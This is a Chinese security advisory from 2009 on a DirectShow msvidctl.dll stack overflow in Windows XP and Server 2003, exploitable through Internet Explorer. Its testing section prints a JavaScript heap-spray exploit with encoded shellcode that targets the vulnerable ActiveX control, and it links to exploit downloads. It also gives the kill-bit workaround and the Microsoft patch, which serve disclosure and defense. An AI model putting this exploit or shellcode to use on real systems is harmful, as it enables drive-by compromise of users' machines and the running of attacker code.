发布日期：2009-07-06
更新日期：2009-07-15

受影响系统：

Microsoft Windows XP SP3
Microsoft Windows XP SP2
Microsoft Windows Server 2003 SP2
Microsoft Windows Server 2003 SP1

描述：

---

BUGTRAQ  ID: 35558,35585
CVE(CAN) ID: CVE-2008-0015,CVE-2008-0020

Microsoft Windows是微软发布的非常流行的操作系统，DirectShow用于在Windows操作系统中处理流媒体。

DirectShow（msvidctl.dll）的BDATuningModelMPEG2TuneRequest视频组件中存在栈溢出漏洞。此漏洞可以通过IE浏览器远程利用，如果用户受骗访问了恶意网页并打开读取MPEG-2文件的话，就可能触发这个溢出，导致执行任意指令。目前这个漏洞正在被广泛的用于挂马攻击。

<*来源：Robert Freeman
  
  链接：http://m.cnbeta.com/article-88024.html
        http://bbs.kafan.cn/thread-513463-1-1.html
        http://blogs.technet.com/srd/archive/2009/07/06/new-vulnerability-in-mpeg2tunerequest-activex-control-object-in-msvidctl-dll.aspx
        http://www.kb.cert.org/vuls/id/180513
        http://secunia.com/advisories/35683/
        http://www.microsoft.com/technet/security/bulletin/MS09-032.mspx?pf=true
        http://www.us-cert.gov/cas/techalerts/TA09-195A.html
        http://www.us-cert.gov/cas/techalerts/TA09-187A.html
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

var appllaa='0';
var nndx='%'+'u9'+'0'+'9'+'0'+'%u'+'9'+'0'+'9'+appllaa;
var dashell=unescape(nndx+'%u5858%u5858%u10EB%u4B5B.....%uBDBD%u36EA%u9DFB%uA555%u4242%uE542%uEC7E%u36EB%u81C8%uC936%uC593%u48BE%u36EB%u9DCB%u48BE%u748E%uFCF4%uBE10%u8E78%uB266%uAD03%u6B87%uB5C9%u767C%uBEBA%uFD67%u4C56%uA286%u5AC8%u36E3%u99E3%u60BE%u36DB%uF6B1%uE336%uBEA1%u3660%u36B9%u78BE%uE316%u7EE4%u6055%u4241%u0F42%u5F4F%u8449%uC05F%u673E%uC6F5%u8F80%u2CC9%u38B1%u1262%uDE06%u6C34%uECF2%u07FD%u1DC2%u2AD8%uA376%uD919%u2E52%u598F%u3329%uB7AE%u7F11%uF6A4%u79BC%uA230%uEAC9%uB0DB%uFE42%u1103%uC066%u184D%uEF27%u1A43%u8367%u0BA0%u0584%u69D4%u03A6%uDBC2%u411D%u8A14%u2510%uADB7%u3D45%u126B%u4627%uA8EE%uD5DB%uc9c9%u87cd%u9292%ud4d0%ud1d1%ud6d1%ude93%ud0d2%uca92%u92d0%ucbce%ud5de%uced2%u93c9%uc5d8%ubdd8%ubdBD%uBDBD%uBDBD%uBDBD%uBDBD%uBDBD%uBDBD%uEAEA'); // xor:0BD
var headersize=20;
var omybro=unescape(nndx);
var slackspace=headersize+dashell.length;
while(omybro.length<slackspace)
omybro+=omybro;
bZmybr=omybro.substring(0,slackspace);
shuishiMVP=omybro.substring(0,omybro.length-slackspace);
while(shuishiMVP.length+slackspace<0x30000)  //生成大量数据
shuishiMVP=shuishiMVP+shuishiMVP+bZmybr;
memory=new Array();
for(x=0;x<300;x++)
memory[x]=shuishiMVP+dashell;
var myObject=document.createElement('object');
DivID.appendChild(myObject);
myObject.width='1';
myObject.height='1';
myObject.data='./logo.gif'; //一个非GIF文件
myObject.classid='clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';

http://www.rec-sec.com/exploits/aa.rar
http://www.milw0rm.com/exploits/9108

建议：

---

临时解决方法：

* 对漏洞相关的控件设置Kill Bit，由于设计上这个控件并不配合IE使用，所以对此控件设置Kill Bit应该不会对系统造成太大影响。
  
  对CLSID：0955AC62-BF2E-4CBA-A2B9-A63F772D46CF设置Kill Bit，或者将以下文本保存为.REG文件并导入：

  Windows Registry Editor Version 5.00

  [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{0955AC62-BF2E-4CBA-A2B9-A63F772D46CF}]
“Compatibility Flags”=dword:00000400

* 暂时不要使用IE浏览器，可以使用Opera或Firefox。

厂商补丁：

Microsoft
---------
Microsoft已经为此发布了一个安全公告（MS09-032）以及相应补丁:
MS09-032：Cumulative Security Update of ActiveX Kill Bits (973346)
链接：http://www.microsoft.com/technet/security/bulletin/MS09-032.mspx?pf=true

浏览次数：24019
严重程度：0（网友投票）